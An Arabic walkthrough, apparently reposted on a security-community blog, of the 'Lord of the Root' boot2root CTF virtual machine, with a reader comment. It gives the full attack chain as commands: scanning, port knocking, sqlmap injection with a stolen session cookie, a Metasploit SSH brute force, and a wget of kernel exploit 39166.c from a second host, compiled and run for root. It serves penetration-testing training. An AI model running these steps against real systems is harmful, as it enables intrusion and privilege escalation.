المقال المثبتمواضيع عامةمواضيع ومقالات

مقال : حل تحدي Hack the Lord of the Root VM

تم أرشفة هذا المحتوى


تحدي أخر من تحديات Boot2Root والذي تم تحضيره بوساطة KoocSec لتمارين الإختراق. قام بتحضيره بمستوى اختبار OSCP خاصته. وهو مستوحى من فلم The Lord Of The Ring.

قم بتحميل VM من هنا

لنبدأ بالشرح

أولا, سوف نحدد هدفنا

netdiscover

هدفنا هو 192.168.1.5

الان سوف نستخدم اداة nmap لمعرفة المنافذ والبروتوكولات.

nmap –p- -A 192.168.1.5

النتيجة تظهر لنا بأن منفذ 22 مفتوح مع خدمة SSH. المنفذ 80 غير مفتوح وهذا يعني بانه لايمكننا فتح هذا السيرفر من خلال المتصفح.وبالتالي سوف نحاول ان نرى ماذا يملك المنفذ 22 ليقترحه,لنذهب الى terminal في كالي :

ssh 192.168.1.5

ظهرت رسالة “knock friend to enter” و “easy as 123” وسوف يطلب ايضا كلمة المرور التي لانعرفها لحد الأن. الان هذا يعتبر تلميح باتجاه port knocking. لنقم بالمحاولة:

nmap –r –Pn –p 1,2,3 192.168.1.5

خيارات االامر السابق :

r- : لمسح المنافذ كلها على التوالي.

Pn- : لمعاملة كل الـ hosts كـ online.
p- : لمسح منافذ معينة.
إستخدمنا المنافذ 1,2,3 للسهولة.

الأن قم بعمل مسح nmap. في هذه المرة نأمل بأن نملك اكثر من منفذ في النتيجة.

nmap –p- -A 192.168.1.5

وكما ترى يوجد اكثر من منفذ مفتوح بالمقارنة مع المسح السابق مثل منفذ 1337 وهو خدمة http وهذا ماأردناه بما ان منفذ 80 غير مفتوح.لنفتح Ip الهدف مع هذا المنفذ.

192.168.1.5:1337

يقوم بفتح صفحة بصورة واحدة. ولايوجد شئ  في الـ page source أيضا . لهذا استخدمت nikto هنا.

nikto –h 192.168.1.5:1337

 

كل مسار يظهر في نتيجة nikto غير مفيده . لهذا حاولت مع robots.txt الذي احاول به دائما بشكل افتراضي.

 

و بوووووووووووم ! كنت محقا وهاهي الصورة تفتح هنا. بالإضاافة لذلك قمت بالتحقق من page source.

 

في page source وجدت كود Base64 والذي قمت بفك تشفيره بإستخدام HackBar.

 

وسوف يعطيني النتيجة كما هو موضح بالأعلى لكن هنا سوف تكون الخدعة. سوف نقوم بالمزيد من فك التشفير لكن فقط من “L الى =” لانها base64 coded string. وبالمثل قم بالمزيد من فك التشفير.

 

وبناء على فك التشفير, تحصلنا على رابط ولنقم بفتحه.

 

نحن الأن وجها لوجه مع بوابة تسجيل الدخول. سأحاول تسجيل الدخول بإسم مستخدم وكلمة مرور عشوائيتين لكن هذه العملية ستؤدي الى تسجيل الكوكيز بواسطة BurpSuite.

بعد ما سجلنا الكوكيز سوف نحاول إستخدامها في خطوتنا التالية, وعلى سبيل المثال sqlmap. الأن لنجمع قاعدة بيانات لمعرفة اسم المستخدم وكلمة المرور لهذا قررت إستخدام sqlmap.

والأمر الذي إستخدمته هو :

sqlmap -u http://192.168.1.5:1337/978345210/index.php –forms –batch –crawl=10 –
cookie=ibf29bpuc0864gmfobpdsg0pu0 –level=5 –risk=3 –dbs

عندما تقوم بتنفيذ هذا الأمر سوف يسألك 3 أسئلة.جاوب على السؤالين الأولين بكلمة no وبكلمة yes على السؤال الثالث.

 

عندها سوف يبدا بجمع قاعدة البيانات

 

 

وأخيرا سوف يظهر لك قاعدة البيانات لأسماء المستخدمين وكلمات المرور.

 

الأن يجب حفظ قاعدة البيانات هذه في ملفين نصيين مختلفين. وإستخدامهم في ssh log in attack بمساعدة هجوم Brute force. ولتنفيذ هذا الهجوم, توجه الى terminal في كالي وقم بفتح ميتاسبلويت بإستخدام الأمر msfconsole واكتب ايضا:

use auxiliary/scanner/sh/shh_login
set rhosts 192.168.1.5
set user_file /root/Desktop/user
set pass_file /root/Desktop/pass
 exploit

والنتيجة ستظهر لك اسم المستخدم وكلمة المرور الصحيحتين, وعلى سبيل المثال: smeagol:MyPreciousR00t

الأن قم بالدخول عبر ssh بإستخدام اسم المستخدم وكلمة المرور هذه.

ssh [email protected]

وقم بإدخال كلمة المرور عندما تطلب.وعندما تدخل قم بكتابة الأمر التالي لمعرفة نسخة kernal الحالية.

lsb_release -a

 

النسخة هي 14.04 ولحسن الحظ لدينا إستغلال لهذه النسخة. في terminal قم بالبحث عن الإستغلال المناسب :

searchsploit ubuntu 14.04

 

الإستغلال الذي سنستخدمه هنا هو 39166.c ومن اجل إستخدام هذا الإستغلال يجب ان نحمله و نعمل compile له وسنكتب الأمر التالي:

wget http://192.168.1.18/39166.c
 gcc 39166.c –o shell

الأمر الأول سوف يحمل الإستغلال والأمر الثاني سوف يعمل compile ويحفظه في ملف اسمه shell. الأن يجب ان نعطي صلاحية لل shell وفي النهاية يجب علينا ان نشغله.

chmod 777 shell
.//shell

تنفيذ ملف shell سوف يأخذك للروت وللموافقة قم بإستخدام الأمر التالي:

whoami

ولندخل الأن في مجلد الرووت ولنرى ماذا تحتوي:

cd /root
 ls

هنا, وجدنا ملف نصي بإسم flag وهو هدفنا. دعونا لانضيع الوقت ولنبدأ بقراته.

cat Flag.txt

 

المقالة الأصلية (Hack the Lord of the Root VM (CTF Challenge

isecur1ty

مجتمع عربي للهاكر الأخلاقي وخبراء الحماية يركّز على مفهوم اختبار الاختراق وجديد أخبار الحماية

مقالات ذات صلة

‫2 تعليقات

  1. السلام عليكم
    عندي مشكلة في الفرشوال بوكس
    انا مسطب كالي 2017 اساسي وحمل ال vm بتاع التحدي بس المشكلة انه لما باستخدم netdiscover مابيظهرش الايبي بتاع الvm حولت الاتصال من nat الي host only adabter ونفس المشكلة وحولتة ل bridged ومزالت المشكلة موجود ايه الحل

اترك تعليقاً

لن يتم نشر عنوان بريدك الإلكتروني. الحقول الإلزامية مشار إليها بـ *

زر الذهاب إلى الأعلى